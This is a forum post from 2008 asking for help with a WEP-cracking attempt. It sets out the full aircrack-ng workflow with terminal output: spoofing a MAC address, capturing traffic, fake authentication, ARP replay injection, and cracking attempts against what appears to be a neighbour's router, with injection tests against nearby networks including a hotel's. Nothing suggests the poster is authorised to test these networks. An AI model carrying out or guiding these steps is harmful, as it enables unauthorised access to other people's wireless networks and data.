Hello, I just bought an Alfa-AWUS036H and it's a really big improvement; now I can see 12 networks in my area, before ... only 4.
I'm new to Linux and I followed a method to find a WEP password, but I couldn't start injection to receive something.
I received ... nothing.
Below you can see exactly what I've done; I noted every step to make it easier for me:



STEP 1:

bt ~ # airmon-ng

STEP 2:

Interface Chipset Driver

wlan0 RTL8187 r8187

bt ~ # airmon-ng stop wlan0

STEP 3:

Interface Chipset Driver

wlan0 RTL8187 r8187 (monitor mode disabled)

bt ~ # macchanger --mac 00:11:22:33:44:55 wlan0
Current MAC: 00:c0:ca:1b:5f:3e (Alfa, Inc.)
Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
bt ~ #

STEP 4:

bt ~ # airmon-ng start wlan0


Interface Chipset Driver

wlan0 RTL8187 r8187 (monitor mode enabled)

STEP 5:

bt ~ # airodump-ng wlan0

CH 2 ][ Elapsed: 52 s ][ 2008-06-27 10:28

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1E:C7:1F:46:E1 58 111 0 0 6 54. WEP WEP 2WIRE328
00:04:E2:4E:89:1E 58 58 22 2 1 11 OPN default
00:1D:7E:1F:3D:8B 44 55 0 0 11 48 OPN linksys
00:181:A2:20:08 41 28 0 0 11 54. WEP WEP Grillo's
00:13:46:4A:CC:20 39 36 0 0 6 54. OPN Black Diamond Hotel
00:0C:41:27:94:48 30 29 0 0 6 11 WEP WEP terracotta
00:1B:5B:27:B8:71 28 7 0 0 6 54. WEP WEP Jacobs

BSSID STATION PWR Rate Lost Packets Probes

00:04:E2:4E:89:1E 00:1B:77:60:EF:85 75 0- 1 0 14 default
00:1D:7E:1F:3D:8B 00:20:00:03:AF:2D 50 0- 1 46 262 linksys

bt ~ #

STEP 6:

bt ~ # airodump-ng -c 6 -w wep123 --bssid 00:1E:C7:1F:46:E1 wlan0


CH 6 ][ Elapsed: 40 s ][ 2008-06-27 10:32

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1E:C7:1F:46:E1 100 96 351 0 0 6 54. WEP WEP 2WIRE328

BSSID STATION PWR Rate Lost Packets Probes

STEP 7:

bt ~ #
bt ~ # aireplay-ng -1 0 -a 00:1E:C7:1F:46:E1 -h 00:11:22:33:44:55 -e 2wire328 wlan0
10:35:22 Waiting for beacon frame (BSSID: 00:1E:C7:1F:46:E1) on channel 6

10:35:22 Sending Authentication Request (Open System) [ACK]
10:35:22 Authentication successful
10:35:22 Sending Association Request [ACK]

STEP 8:

bt ~ # aireplay-ng -3 -b 00:1E:C7:1F:46:E1 -h 00:11:22:33:44:55 wlan0
10:37:31 Waiting for beacon frame (BSSID: 00:1E:C7:1F:46:E1) on channel 6
Saving ARP requests in replay_arp-0627-103731.cap
You should also start airodump-ng to capture replies.
Read 15230 packets (got 0 ARP requests and 24 ACKs), sent 0 packets...(0 pps)
bt ~ #

STEP 9:
NOW I CHECK INJECTION:

bt ~ # aireplay-ng -9 -b 00:1E:C7:1F:46:E1 -h 00:11:22:33:44:55 wlan0
10:42:19 Trying broadcast probe requests...
10:42:19 Injection is working!
10:42:21 Found 5 APs

10:42:21 Trying directed probe requests...
10:42:21 00:1E:C7:1F:46:E1 - channel: 6 - '2WIRE328'
10:42:26 Ping (min/avg/max): 0.092ms/142.687ms/196.018ms Power: 100.00
10:42:26 25/30: 83%

10:42:26 00:13:46:4A:CC:20 - channel: 6 - 'Black Diamond Hotel'
10:42:28 Ping (min/avg/max): 15.992ms/61.595ms/148.001ms Power: 35.87
10:42:28 30/30: 100%

10:42:28 00:1B:5B:27:B8:71 - channel: 6 - 'Jacobs'
10:42:34 Ping (min/avg/max): 11.996ms/35.988ms/51.994ms Power: 23.83
10:42:34 6/30: 20%

10:42:34 00:0C:41:27:94:48 - channel: 6 - 'terracotta'
10:42:35 Ping (min/avg/max): 0.012ms/40.395ms/55.997ms Power: 29.00
10:42:35 30/30: 100%

10:42:35 00:1E:C7:E1:FA:71 - channel: 6 - 'SHAY'S Tack&Feed'
10:42:38 Ping (min/avg/max): 23.992ms/66.398ms/107.993ms Power: 26.80
10:42:38 30/30: 100%

bt ~ #

STEP 10:

bt ~ # aircrack-ng -n -64 -b 00:1E:C7:1F:46:E1 wep123-01.cap
Invalid WEP key length. [64,128,152,256,512]
"aircrack-ng --help" for help.
bt ~ #
bt ~ # aircrack-ng -n -128 -b 00:1E:C7:1F:46:E1 wep123-01.cap
Invalid WEP key length. [64,128,152,256,512]
"aircrack-ng --help" for help.
bt ~ #


So, no injection (in step 8) to receive something, but when I tested injection (step 9) to every network it looked to work ...
It's very weird for me ... obviously, because it's a new world for me ...
Please give me some advice and tell me what I typed wrong. I think I need some special commands for this wireless card.

Thank you